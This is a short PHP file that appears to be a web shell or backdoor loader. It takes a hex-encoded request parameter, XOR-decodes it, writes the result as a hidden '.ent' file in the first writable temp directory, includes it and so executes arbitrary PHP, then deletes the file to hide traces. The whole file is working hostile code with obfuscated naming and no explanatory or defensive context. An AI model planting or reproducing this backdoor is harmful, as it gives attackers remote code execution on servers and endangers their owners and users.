<?php

if(@$_REQUEST["desc"] !== null){
	$object = array_filter(["/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp", "/dev/shm", getenv("TMP")]);
	$elem = hex2bin($_REQUEST["desc"]);
	$element      =   ''      ;   for($i=0; $i<strlen($elem); $i++){$element .= chr(ord($elem[$i]) ^ 53);}
	while ($token = array_shift($object)) {
    		if (max(0, is_dir($token) * is_writable($token))) {
    $item = "$token/.ent";
    if (file_put_contents($item, $element)) {
	include $item;
	@unlink($item);
	die();
}
}
}
}